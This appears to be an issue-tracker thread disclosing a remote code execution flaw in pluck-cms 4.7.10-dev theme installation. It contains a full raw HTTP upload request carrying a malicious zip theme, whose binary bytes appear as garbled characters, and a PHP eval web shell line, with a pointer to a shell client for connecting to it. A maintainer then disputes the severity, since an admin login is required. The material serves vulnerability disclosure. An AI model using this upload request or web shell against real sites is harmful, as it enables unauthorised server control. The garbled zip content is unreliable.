pluck-cms<=4.7.10-dev4 admin background exists a remote command execution vulnerability when install a theme

[SecurityCN]

pluck-cms<=4.7.10-dev4 admin background exists a remote command execution vulnerability when install a theme Demo: After the installation is successful, go to the management background. options->choose theme->install theme

vul-url： http://192.168.80.1/pluck-4.7.10-dev3/admin.php?action=themeinstall According to the default template, the theme is faked with the content of the theme shell.php.zip as follows: Insert phpinfo(); in the theme.php file;

upload

POST /pluck-4.7.10-dev3/admin.php?action=themeinstall HTTP/1.1
Host: 192.168.80.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.80.1/pluck-4.7.10-dev3/admin.php?action=themeinstall
Cookie: PHPSESSID=en364hjlvg84vpdvmv9gdlc0h2
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=---------------------------10771789627341
Content-Length: 2441

-----------------------------10771789627341
Content-Disposition: form-data; name="sendfile"; filename="shell.php.zip"
Content-Type: application/x-zip-compressed

PK     楽VO            
   shell.php/PK    漇VO?K?   
     shell.php/info.phpe幧
?嗭吘肞<j呼?鐴D$$?殟,趱M*侾標7薬p抡U譣??
?0?z?N%???
?.?魫G_
?D尞锖i氌`祂?&犇 梿}? ?顪m?c]照j>胜?4A燫m??桯[?>?镗G4慺蓈3阒F魠?PK    嫇OO蘺貔{  ?     shell.php/style.css誚M彌0=o~叆≧籞睝毻*?鞧玘zj?喐k02&洿??唋音凿惸虥?笃N溃=??p鴾^f?r婆
M?险{=箞y&?鞼鑷 An圖呔贸&丨^皭b懶l呠|窞糔&x舎?m桡镛C?;镈$?K?霥@8[ZPIⅢ?攖K蚊n鴸?簟z囄R挄h扮?煦tt斤?杞煆驱3:?郚拃伹NMQ2厡h?檢n垭"荙D长??歭?y嬟〕
罸璤h$7+碶ㄤ脩0U蘺A祎A啀狤Fb群p?&戒虠?]_"鐌舚?@椬-?u?笖<y 挛銫頥ク6Do莀茇猰?緂??靷?Jw咁n栽讘<?Es貦汛竻覦嬄颖k墐偝瞆| !紂[垄ZN?刅}恶郎溃+=pGU菥|/梿倩???MS紮O业Z, 嵻3葥駥 ^蕚Fa??\@泴?傗?氶﹚x桷挩?钨(亵袪昀鯫2??蛸_江陰踴灶歳鐼_鳜og蹪~顳衜碬K瞍m覐]@-锾?鐠游J璋梀伶c;h选To1p?+?0V蠁﹊"鹁襆臣琄b铧;A1籅_  ?IC|??NA?&fわ?姚.潥4鉵5u尕o蝜?,?ぢ?蟲?黋 _炧膿胬7?偶睊
>I*盡{;Dk
嘜乤遥墽Y摊写縛?駗囐Y昝d脂鷺b闔h|?蕠瓞F/?霭澅琽瞀盡k睬辵4_簝I鸜捚?ON扇惋帖?闂鷍   8?$=睋
瀭?T窰1[m觊D))
?还^gT€郪3
蚾€i擣 服h爓,(英?_!婀i線郯*GO.%W抝c摫胎?B痤lAⅤ萿酊PK    筍VO鱪鷸?  ?     shell.php/theme.php}S羘贎=?橒睩*?9?寓:%FmOh?鉛斓e痗慂褫怠敀驸蠜麈i<M?J?BY*F圖?JI?牟D\猟飔;#!戂d避豸+锳V 顒采}C 嶳 ???BF欇v;ot=?
~?佌鷵繕傉斠Y0?_?\?<〣剨淫?+V*浚串kЬu瞓K僄?*襼賞鍀;?Md9~C?-?Mw 撣闭n?~鵼B苪l`敞7)*f聻?=6=g|o"?
3轠aぎMv5奭PB%h,渇擝aS秢瓡w@=適次M适&UB> I剏睵塛詸kX??欎?Ju磛髺禍m祐   灛輁X;i:.@V 矷F3?u\?笶蒊濧\`t鰨?羭硚鬗M箔悗?忨T?e鼈<锌馏g鐢'U右\曞5瘹鉙<^5w琮PK
?      楽VO            
 $              shell.php/
       
  柭萵€堈
梷Kt€堈
袘€]y堈
PK
?     漇VO?K?   
   $           (   shell.php/info.php
       
  4=t€堈
u7瘈堈
]?|堈
PK
?     嫇OO蘺貔{  ?   $           
  shell.php/style.css
       
  €怷DC冋
)A7瘈堈
l洹|堈
PK
?     筍VO鱪鷸?  ?   $           ?  shell.php/theme.php
       
  9晸€堈
yg7瘈堈
?察z堈
PK      ?  ?    
-----------------------------10771789627341
Content-Disposition: form-data; name="submit"

Upload
-----------------------------10771789627341--

1.default theme

View site

2.choose shell.php theme

View site http://192.168.80.1/pluck-4.7.10-dev3/

phpinfo();Function is executed

The vulnerability exists in the latest pluck-4.7.10-dev2 pluck-4.7.10-dev3. The pluck-4.7.10-dev4 version cannot be uploaded due to bugs in the program, but in theory the RCE vulnerability exists. In pluck-4.7.10-dev4 version

[SecurityCN]

Add the following code to theme.php to getshell

; phpinfo(); ?>
<?php @eval($_POST[c]);

Use chopper connect

[BSteelooper]

This is not an exploit. This like inserting the text hacked in the page.. there is no way to upload the theme without knowing the password, and there is no way into tricking an unsuspecting victim to fall for this.